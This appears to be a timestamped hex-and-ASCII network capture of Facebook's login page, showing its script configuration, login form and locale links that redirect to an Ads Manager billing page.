                                                                                                                                                                                    2023-01-05 08:01:25 UTC20047INData Raw: 79 4e 49 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 59 6f 32 55 7a 4f 68 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 57 2f 72 2f 4e 6b 4a 57 66 32 44 48 41 79 67 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 58 4e 61 4d 6e 32 2b 22 20 6e 6f 6e 63 65 3d 22 70 76 31 45 34 43 4a 64 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 70 76 31 45 34 43 4a 64 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65
                                                                                                                                                                                    Data Ascii: yNI.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Yo2UzOh" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/NkJWf2DHAyg.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="XNaMn2+" nonce="pv1E4CJd"></script><script nonce="pv1E4CJd">requireLazy(["Haste
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20049INData Raw: 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 68 61 73 68 74 61 67 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36
                                                                                                                                                                                    Data Ascii: lice,ServerJS){(new ServerJS()).handle({"define":[["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20050INData Raw: 5b 22 43 75 72 72 65 6e 74 55 73 65 72 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 43 43 4f 55 4e 54 5f 49 44 22 3a 22 30 22 2c 22 55 53 45 52 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45
                                                                                                                                                                                    Data Ascii: ["CurrentUserInitialData",[],{"ACCOUNT_ID":"0","USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_ME
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20052INData Raw: 69 6f 6e 22 3a 22 35 33 37 2e 33 36 22 2c 22 70 6c 61 74 66 6f 72 6d 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 70 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55
                                                                                                                                                                                    Data Ascii: ion":"537.36","platformArchitecture":"64","platformName":"Windows","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["KSConfig",[],{"killed":{"__set":["MLHU
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20053INData Raw: 49 54 49 4e 47 5f 43 41 4e 44 49 44 41 54 45 5f 50 4f 52 54 41 4c 5f 41 43 43 4f 55 4e 54 5f 44 45 4c 45 54 49 4f 4e 5f 43 41 52 44 22 2c 22 42 49 5a 5f 49 4e 42 4f 58 5f 50 4f 50 5f 55 50 5f 54 49 50 5f 4e 41 56 49 47 41 54 49 4f 4e 5f 42 55 47 5f 46 49 58 22 2c 22 53 52 54 5f 52 45 56 49 45 57 5f 44 49 53 41 42 4c 45 5f 46 45 4c 4c 4f 57 53 48 49 50 5f 52 45 56 49 45 57 22 2c 22 45 4f 5f 53 54 4f 52 45 5f 48 4f 4d 45 5f 50 41 47 45 5f 43 4f 56 49 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47 37 77 4a 36 62 4a 74 39 4b 22 2c 22 39 4e 70 6b 47 59 77 7a 72 50 47 22 2c 22 33 6f 68 35 4d 77 38 36 55 53 6a 22 2c 22 38 4e 41 63 65 45 79 39 4a 5a 6f 22 2c 22 37 46 4f 49
                                                                                                                                                                                    Data Ascii: ITING_CANDIDATE_PORTAL_ACCOUNT_DELETION_CARD","BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX","SRT_REVIEW_DISABLE_FELLOWSHIP_REVIEW","EO_STORE_HOME_PAGE_COVID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G7wJ6bJt9K","9NpkGYwzrPG","3oh5Mw86USj","8NAceEy9JZo","7FOI
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20055INData Raw: 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c 22 62 6f 6f 6b 69 6e 67 2e 63 6f 6d 22 2c 22 6e 69 62 69 6f 2e 6e 6f 22 5d 7d 2c 33 38 37 31 5d 2c 5b 22 49 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 69 6e 69 74 69 61 6c 43 6f 6e 73 65 6e 74 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 5d 7d 2c 22 6e 6f 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 73 68 6f 75 6c 64 53 68 6f 77 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 22 3a 66 61 6c 73 65 7d 2c 34 33 32 38 5d 2c 5b 22 57 65 62 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 53 65 72 76 65 72 47 75 65 73 73 22 2c 5b 5d 2c 7b 22 63 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 22 3a 22 45 58 43 45 4c 4c 45 4e 54 22 7d 2c 34 37 30 35 5d 2c 5b
                                                                                                                                                                                    Data Ascii: buy.com.mx","booking.com","nibio.no"]},3871],["InitialCookieConsent",[],{"deferCookies":false,"initialConsent":{"__set":[]},"noCookies":false,"shouldShowCookieBanner":false},4328],["WebConnectionClassServerGuess",[],{"connectionClass":"EXCELLENT"},4705],[
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20056INData Raw: 75 73 61 6e 64 73 53 65 70 61 72 61 74 6f 72 22 3a 34 2c 22 73 74 61 6e 64 61 72 64 44 65 63 69 6d 61 6c 50 61 74 74 65 72 6e 49 6e 66 6f 22 3a 7b 22 70 72 69 6d 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 2c 22 73 65 63 6f 6e 64 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 7d 2c 22 6e 75 6d 62 65 72 69 6e 67 53 79 73 74 65 6d 44 61 74 61 22 3a 6e 75 6c 6c 7d 2c 35 34 5d 2c 5b 22 53 65 73 73 69 6f 6e 4e 61 6d 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 65 65 64 22 3a 22 32 67 4c 70 22 7d 2c 37 35 37 5d 2c 5b 22 5a 65 72 6f 43 61 74 65 67 6f 72 79 48 65 61 64 65 72 22 2c 5b 5d 2c 7b 7d 2c 31 31 32 37 5d 2c 5b 22 5a 65 72 6f 52 65 77 72 69 74 65 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 72 65 77 72 69 74 65 5f 72 75 6c 65 73 22 3a 7b 7d 2c 22 77 68 69 74 65 6c
                                                                                                                                                                                    Data Ascii: usandsSeparator":4,"standardDecimalPatternInfo":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null},54],["SessionNameConfig",[],{"seed":"2gLp"},757],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitel
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20057INData Raw: 6c 61 73 73 69 66 69 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 64 6f 67 66 6f 6f 64 69 6e 67 22 3a 31 2c 22 5c 2f 78 74 69 2e 70 68 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 62 6c 69 74 65 5c 2f 63 6f 6e 66 69 67 5c 2f 22 3a 31 2c 22 5c 2f 68 72 5c 2f 7a 73 68 5c 2f 77 63 5c 2f 22 3a 31 2c 22 5c 2f 61 6a 61 78 5c 2f 62 6f 6f 74 6c 6f 61 64 65 72 2d 65 6e 64 70 6f 69 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 65 64 75 63 61 74 69 6f 6e 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 66 65 61
                                                                                                                                                                                    Data Ascii: lassifier\/":1,"\/zero\/dogfooding":1,"\/xti.php":1,"\/zero\/fblite\/config\/":1,"\/hr\/zsh\/wc\/":1,"\/ajax\/bootloader-endpoint\/":1,"\/mobile\/zero\/carrier_page\/":1,"\/mobile\/zero\/carrier_page\/education_page\/":1,"\/mobile\/zero\/carrier_page\/fea
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20059INData Raw: 2f 72 65 6c 69 61 62 69 6c 69 74 79 22 3a 31 2c 22 5c 2f 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6d 72 5c 2f 22 3a 31 2c 22 5c 2f 72 65 67 5c 2f 22 3a 31 2c 22 5c 2f 72 65 67 69 73 74 72 61 74 69 6f 6e 5c 2f 6c 6f 67 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 66 31 32 33 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 73 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 69 6e 64 65 78 2e 70 68 70 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 2e 70 68 70 22 3a 31 2c 22 5c 2f 73 72 72 5c 2f 22 3a 31 2c 22 5c 2f 6d 73 69 74 65 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 66 62 73 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 70 72 65 63 6f 6e 66 69 72
                                                                                                                                                                                    Data Ascii: /reliability":1,"\/r.php":1,"\/mr\/":1,"\/reg\/":1,"\/registration\/log\/":1,"\/terms\/":1,"\/f123\/":1,"\/expert\/":1,"\/experts\/":1,"\/terms\/index.php":1,"\/terms.php":1,"\/srr\/":1,"\/msite\/redirect\/":1,"\/fbs\/pixel\/":1,"\/contactpoint\/preconfir
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20060INData Raw: 79 5f 62 72 5f 71 75 65 75 65 5f 69 6d 6d 65 64 69 61 74 65 22 3a 33 2c 22 75 73 65 5f 63 72 69 74 69 63 61 6c 5f 66 6f 72 5f 66 61 6c 6c 62 61 63 6b 5f 66 72 6f 6d 5f 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 2c 22 69 6d 70 72 65 73 73 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 5f 66 6c 61 67 22 3a 33 7d 2c 35 32 33 37 5d 2c 5b 22 63 72 3a 36 39 36 37 30 33 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 30 2d 55 59 6b 7a 4c 57 54 48 63 36 75 33 4d 37 4d 67 57 63 51 32 55 70 38 4b 77 33 31 44 49 63 77 50 58 61 4d 79 45 5f 36 55 78 65 6d 45 6c 79 68 62 32 78 71 78 77 5a 42 4a 78 5f 4e 5f 33 6f 44 79 64 69 31 38 6b 70 51 63 64 4f 36 57 4c 37 73 6c 33 46 5a 6f 65 63 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 30 38 38 38 36 22 2c 5b
                                                                                                                                                                                    Data Ascii: y_br_queue_immediate":3,"use_critical_for_fallback_from_immediate":false,"impression_experiment_flag":3},5237],["cr:696703",[],{"__rc":[null,"Aa0-UYkzLWTHc6u3M7MgWcQ2Up8Kw31DIcwPXaMyE_6UxemElyhb2xqxwZBJx_N_3oDydi18kpQcdO6WL7sl3FZoecU"]},-1],["cr:708886",[
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20062INData Raw: 2c 22 41 61 30 2d 55 59 6b 7a 4c 57 54 48 63 36 75 33 4d 37 4d 67 57 63 51 32 55 70 38 4b 77 33 31 44 49 63 77 50 58 61 4d 79 45 5f 36 55 78 65 6d 45 6c 79 68 62 32 78 71 78 77 5a 42 4a 78 5f 4e 5f 33 6f 44 79 64 69 31 38 6b 70 51 63 64 4f 36 57 4c 37 73 6c 33 46 5a 6f 65 63 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 32 35 31 30 30 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 22 41 61 30 2d 55 59 6b 7a 4c 57 54 48 63 36 75 33 4d 37 4d 67 57 63 51 32 55 70 38 4b 77 33 31 44 49 63 77 50 58 61 4d 79 45 5f 36 55 78 65 6d 45 6c 79 68 62 32 78 71 78 77 5a 42 4a 78 5f 4e 5f 33 6f 44 79 64 69 31 38 6b 70 51 63 64 4f 36 57 4c 37 73 6c 33 46 5a 6f 65 63 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 32 39 34 31
                                                                                                                                                                                    Data Ascii: ,"Aa0-UYkzLWTHc6u3M7MgWcQ2Up8Kw31DIcwPXaMyE_6UxemElyhb2xqxwZBJx_N_3oDydi18kpQcdO6WL7sl3FZoecU"]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue","Aa0-UYkzLWTHc6u3M7MgWcQ2Up8Kw31DIcwPXaMyE_6UxemElyhb2xqxwZBJx_N_3oDydi18kpQcdO6WL7sl3FZoecU"]},-1],["cr:72941
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20063INData Raw: 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 31 70 74 64 6b 78 41 36 4e 4d 74 50 33 62 77 65 34 61 43 47 6e 32 76 7a 6e 6c 4b 36 39 36 41 75 34 30 54 43 52 47 35 49 38 79 58 42 4c 49 71 31 71 32 70 41 77 67 5f 62 34 48 4e 73 32 42 52 53 31 6d 57 77 36 6c 70 45 77 55 7a 63 6a 43 66 49 54 68 4e 6a 50 70 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 39 38 34 30 38 31 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 31 63 55 4f 55 61 58 34 48 49 62 74 53 7a 33 35 66 56 46 36 44 56 69 65 6f 7a 66 53 59 6b 75 59 44 4f 43 68 51 61 36 61 6f 67 30 63 5f 61 7a 49 75 4b 71 57 45 56 5a 63 58 6e 6a 33 79 48 35 6c 6f 4a 59 51 64 44 67 79 4e 54 56 6f 61 65 66 72 2d 6a 45 58 4c 62 74 50 53 48 22 5d 7d 2c 2d 31 5d 5d 2c 22 72 65 71 75 69 72 65
                                                                                                                                                                                    Data Ascii: [],{"__rc":[null,"Aa1ptdkxA6NMtP3bwe4aCGn2vznlK696Au40TCRG5I8yXBLIq1q2pAwg_b4HNs2BRS1mWw6lpEwUzcjCfIThNjPp"]},-1],["cr:1984081",[],{"__rc":[null,"Aa1cUOUaX4HIbtSz35fVF6DVieozfSYkuYDOChQa6aog0c_azIuKqWEVZcXnj3yH5loJYQdDgyNTVoaefr-jEXLbtPSH"]},-1]],"require
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20065INData Raw: 6f 74 69 63 65 3c 2f 75 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 35 38 35 72 20 5f 35 30 66 34 22 3e 59 6f 75 20 6d 75 73 74 20 6c 6f 67 20 69 6e 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 34 2d 75 32 20 5f 31 77 31 74 20 5f 34 2d 75 38 20 5f 35 32 6a 76 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 75 22 20 69 64 3d 22 68 65 61 64 65 72 5f 62 6c 6f 63 6b 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 39 37 77 31 20 5f 35 30 66 36 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 39 61 78 7a 22 3e 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 3c 2f 64 69 76 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e
                                                                                                                                                                                    Data Ascii: otice</u></i><div class="_585r _50f4">You must log in to continue.</div></div></div><div class="_4-u2 _1w1t _4-u8 _52jv"><div class="_xku" id="header_block"><span class="_97w1 _50f6"><div class="_9axz">Log Into Facebook</div></span></div><div class="login
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20066INData Raw: 31 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 5f 35 34 36 36 20 5f 34 34 6d 67 22 20 69 64 3d 22 65 6d 61 69 6c 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 74 65 78 74 20 5f 35 35 72 31 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 69 64 3d 22 65 6d 61 69 6c 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 20 6f 72 20 70 68 6f 6e
                                                                                                                                                                                    Data Ascii: 1" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><div class="clearfix _5466 _44mg" id="email_container"><input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="0" placeholder="Email or phon
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20068INData Raw: 65 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 6e 61 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 6e 61 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 6e 61 6d 65 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f
                                                                                                                                                                                    Data Ascii: e="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autoco
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20069INData Raw: 64 61 74 61 2d 72 65 66 65 72 72 65 72 3d 22 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 70 61 67 65 5f 66 6f 6f 74 65 72 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 75 69 4c 69 73 74 20 6c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 4c 69 73 74 20 5f 32 70 69 64 20 5f 35 30 39 2d 20 5f 34 6b 69 20 5f 36 2d 68 20 5f 36 2d 6a 20 5f 36 2d 69 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 3c 6c 69 3e 45 6e 67 6c 69 73 68 20 28 55 53 29 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32
                                                                                                                                                                                    Data Ascii: data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20071INData Raw: 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 32 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 49 74 61 6c 69 61 6e 22 3e 49 74 61 6c 69 61 6e 6f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d
                                                                                                                                                                                    Data Ascii: k.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir=
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20072INData Raw: 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 65 73 5f 4c 41 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 65 73 2d 6c 61 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20
                                                                                                                                                                                    Data Ascii: ieLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;,
